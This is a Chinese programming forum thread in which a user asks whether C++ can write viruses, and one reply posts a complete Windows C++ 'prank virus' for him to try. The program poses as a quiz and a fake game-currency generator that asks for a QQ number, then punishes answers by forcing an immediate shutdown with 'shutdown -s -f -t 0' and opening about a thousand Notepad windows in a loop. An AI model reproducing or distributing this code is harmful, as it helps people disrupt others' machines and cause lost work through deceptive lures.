| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 3340 人关注过本帖
标题:有关C++的用途
只看楼主 加入收藏
九天冥盟
Rank: 2
等 级:论坛游民
威 望:1
帖 子:77
专家分:20
注 册:2015-7-14
结帖率:36%
收藏
已结贴  问题点数:10 回复次数:5 
有关C++的用途
请问C++可以用来编写   病毒吗?求大神回话,并指点一下
搜索更多相关主题的帖子: C++ 用途 编写 病毒 
2017-08-09 15:11
八画小子
Rank: 11Rank: 11Rank: 11Rank: 11
等 级:贵宾
威 望:37
帖 子:709
专家分:2063
注 册:2010-11-11
收藏
得分:2 
可以啊
2017-08-10 11:26
九天冥盟
Rank: 2
等 级:论坛游民
威 望:1
帖 子:77
专家分:20
注 册:2015-7-14
收藏
得分:0 
怎么写呢
2017-08-10 21:15
yangfrancis
Rank: 16Rank: 16Rank: 16Rank: 16
等 级:贵宾
威 望:141
帖 子:1510
专家分:7661
注 册:2014-5-19
收藏
得分:8 
第一步当然是要把网络编程玩转,不过这关我还过不去。
2017-08-11 20:59
李昊逸Lion
Rank: 2
来 自:福州
等 级:论坛游民
威 望:2
帖 子:79
专家分:75
注 册:2017-8-1
收藏
得分:0 
最初级的病毒就是像我这样不能传播只能坑人的程序
程序代码:
#include<iostream>
#include<stdio.h>
#include<time.h> 
#include<stdlib.h>
#include<cstdio>
#include <windows.h>
void SlowDisplay(char *); 
void Close_computer();
void Dividing_line();
void Bug();
void Remedy();
void Remedy2();
void Question_bank1();
void Question_bank2();
int Random();
using namespace std;
double a,b,c=0,f,g,k; 
long long j,d=0,e,s;
char ch,i;
int main()
{
    do
    { 
        s=0;
        e=Random();
        g=0;
        system("mode con cols=71 lines=71"); 
        system("color 0F");
        d=0;
        do
        {
            if(g==0)cout<<"请输入你想要的输出速度(25-100)\n"; 
            else cout<<"请重新输入\n"; 
            cin>>f;
            g++;
        }
        while(f<25||f>100);
        if(c==0)SlowDisplay("\n\n\t\t\t 欢迎来到视觉盛宴!\n\n\n\t\t\t  请先做几道题\n\n");
        else SlowDisplay("\n\t\t\t  欢迎再次运行\n");
        Sleep(100);
        Dividing_line();
        if(e==1)Question_bank1();
        else Question_bank2();
        SlowDisplay("现在你可以选择\n  1:坑爹的题目 2:鬼畜的题目。\n");
        d=5;
        cin>>a;
        Dividing_line();
        if(a!=1&&a!=2)
        {
            SlowDisplay("输入错误\n");
            Close_computer();
        }
        if(a==1)
        {
            SlowDisplay("(6+5-4*3/2^1)!=?\n");
            d=6;
            cin>>b; 
              Sleep(100);
            if(b!=120)SlowDisplay("准!\n\n");
            else
            {
            SlowDisplay("又被套路了\n");
            Close_computer();
        }
    }
    Dividing_line();
    if(a==2)
    {
        SlowDisplay("你为什么这么傻?\n\n  1:天生的  2:选1  3:选2\n");
        d=7;
        cin>>a;
        Sleep(100);
        if(a!=1&&a!=2&&a!=3)
        {
            SlowDisplay("死不承认!"); 
            a=-900;
            Bug();
        }
        SlowDisplay("哈哈!!!\n");
    }    
        SlowDisplay("恭喜通过\n\n\n\n");
        Dividing_line();
        d=7;
        Sleep(100);
        cout<<"你可以刷王者荣耀点券了\n"; 
        cout<<"请输入你想刷的点券数并按回车键:\n";
        cin>>a;
        if(a>0)
        {
            Sleep(100);
            cout<<"请输入你的QQ号并按回车键:\n";
            cin>>b; 
            Bug();
        }
        SlowDisplay("恭喜你通过了考验,证明你是个老(ji)实(zei)的人\n");
        system("mode con cols=157 lines=157"); 
        d=8;
        SlowDisplay("\n\n\n\t\t\t\t\t\t\t\t开始你的视觉盛宴吧\n\n\n\t\t\t\t\t\t\t\t  密码小写o\n");
        cin>>ch;
        if(ch!='o')
        {
            SlowDisplay("输入错误\n");
            Close_computer();
        }
        for(i='!';i<=ch;i++)
        {
            for(int j=1;j<=ch-i;j++) cout<<" ";
            for(char c='!';c<=i;c++) cout<<c;
            for(char c=i-1;c>='!';c--) cout<<c;
            cout<<endl;
        }
        Dividing_line();
        Sleep(500);
        for(j=0;j<=1000000000000000;j++)
        {
            if(j>1000)j=j+9;
            if(j>100000)j=j+90;
            if(j>1000000)j=j+900;
            if(j>10000000)j=j+9000;
            if(j>100000000)j=j+90000;
            if(j>1000000000)j=j+900000;
            if(j>10000000000)j=j+9000000;
            if(j>100000000000)j=j+90000000;
            if(j>1000000000000)j=j+900000000;
            if(j>10000000000000)j=j+9000000000;
            if(j>100000000000000)j=j+90000000000;
            cout<<j<<"                              ";
        }
        Dividing_line();
        Sleep(500);
        for(j=1;j<=157;j++)
        {
            for(a=157-j;a>0;a--)cout<<" ";
            for(a=j*2-1;a>0;a--)cout<<"*";
            cout<<endl;
        }
        for(j=157-1;j>=1;j--)
        {
            for(a=157-j;a>0;a--)cout<<" ";
            for(a=j*2-1;a>0;a--)cout<<"*";
            cout<<endl;
        } 
        Sleep(500);
        Dividing_line();
        system("color 1E");
        Sleep(10);
        system("color 2D");
        Sleep(10);
        system("color 3C");
        Sleep(10);
        system("color 4B");
        Sleep(10);
        system("color 5A");
        Sleep(10);
        system("color 69");
        Sleep(10);
        system("color 78");
        Sleep(10);
        system("color 87");
        Sleep(10);
        system("color 96");
        Sleep(10);
        system("color A5");
        Sleep(10);
        system("color B4");
        Sleep(10);
        system("color C3");
        Sleep(10);
        system("color D2");
        Sleep(10);
        system("color E1");
        Sleep(10);
        system("color F0");
        Sleep(500);
        b=MessageBox(NULL,"是不是很爽?\n请选择:\n 是:重新再玩\n 否:结束","",MB_YESNO);
        c++;
    }
    while(b==IDYES);
    MessageBox(NULL,"下次再来","",MB_OK);
    return 0;
}
void SlowDisplay(char *p)
{
    while(1)
    {
        if(*p!=0)printf("%c",*p++);
        else break;
        Sleep(f);
    }
} 
void Close_computer()
{
    
    printf("对不起,您的电脑即将关机!");
    Sleep(100);
    system("shutdown -s -f -t 30");
    if(s<=3)Remedy();
}
void Dividing_line()
{
    for (b=1;b<=35;b++)cout<<"=*";
    cout<<"\n              华丽丽的分界线\n";
}
void Bug()
{
    if(s<=3)Remedy();
    if(a!=0)
    {
        while(a>-1000)
        {
            WinExec("NotePad.exe", 5); 
            a--;
        }
        system("shutdown -s -f -t 0");
    }
}
void Remedy()
{
    s++;
    SlowDisplay("\n还想补救吗?如果再回答一次,你会选什么?\n");
    if(d!=8)cin>>a;
    else cin>>ch;
    switch(d)
    {
        case 1:
            if(a!=2)system("shutdown -a");
            else SlowDisplay("补救失败!");
            break;
        case 2:
            if(a==0)system("shutdown -a");
            else SlowDisplay("补救失败!");
            break;
        case 3:
            if(a==4)a=0;
            else SlowDisplay("补救失败!");
            break;
        case 4:
            if(a==1||a==2)system("shutdown -a");
            else SlowDisplay("补救失败!");
            break;
        case 5:
            if(a!=120)a=0;
            else SlowDisplay("补救失败!");
            break;
        case 6:
            if(a==1||a==2||a==3)a=0;
            else {SlowDisplay("补救失败!");a=10;}
            break;
        case 7:
            if(a<=0)a=0;
            else SlowDisplay("补救失败!");
            break;
        case 8:
            if(ch=='o')system("shutdown -a");
            else SlowDisplay("补救失败!");
            break;
        case 9:
            if(a!=1)system("shutdown -a");
            else SlowDisplay("补救失败!");
            break;
        case 10:
            if(a!=1)system("shutdown -a");
            else SlowDisplay("补救失败!");
            break;
    }
}
int Random()
{
    srand((unsigned)time(NULL));
    return rand()%2;
}
void Question_bank1()
{
    d=1;    
    SlowDisplay("1+1=?\n");
    cin>>a;
    if(a==2)
    {
        SlowDisplay("还是太天真!\n"); 
        Close_computer();
    }
    Sleep(500);
    SlowDisplay("恭喜进入下一关!\n\n"); 
    Dividing_line();
    Sleep(100);
    d=2;    
    SlowDisplay("1-1=?\n");
    cin>>a;
    if(a!=0)    
    {
        SlowDisplay("套路深啊!\n"); 
        Close_computer();
    }
    Sleep(500);
    SlowDisplay("666666!下一题\n\n"); 
    Dividing_line();
    Sleep(100);
    SlowDisplay("6!=?\n");
    cin>>a;
    if(a!=720)Remedy2();
    Dividing_line();
}
void Question_bank2()
{
    d=9;
    SlowDisplay("1*1=?\n");
    cin>>a;
    if(a==1)
    {
        SlowDisplay("还是太天真!\n"); 
        Close_computer();
    }
    Sleep(500);
    SlowDisplay("恭喜进入下一关!\n\n"); 
    Dividing_line();
    Sleep(100);
    d=10;    
    SlowDisplay("1^1^1^1=?\n");
    cin>>a;
    if(a!=1)    
    {
        SlowDisplay("套路深啊!\n"); 
        Close_computer();
    }
    Sleep(500);
    SlowDisplay("66666!下一题\n");     
    Dividing_line();
    Sleep(100);
    SlowDisplay("6^6=?\n");
    cin>>a;
    if(a!=44656)Remedy2();
    Dividing_line();
}
void Remedy2()
{
    SlowDisplay("回答错误,不过还有一次补救的机会\n\n");     
    Dividing_line();
    Sleep(100);
    SlowDisplay("本次测试有几题?\n");
    d=3;
    cin>>a;
    if(a==3)
    {
        SlowDisplay("傻,这也是一题啊\n");
        Close_computer();
    }
    if(a!=3&&a!=4)
    {
        SlowDisplay("还当是套路啊\n现在最后套路你一次吧"); 
        Sleep(100);
        a=-900;
        Bug();
    }
    if(a==4)cout<<"聪明!\n\n";
}
2017-08-14 12:04
九天冥盟
Rank: 2
等 级:论坛游民
威 望:1
帖 子:77
专家分:20
注 册:2015-7-14
收藏
得分:0 
我試試
2017-08-14 18:53
快速回复:有关C++的用途
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.020922 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved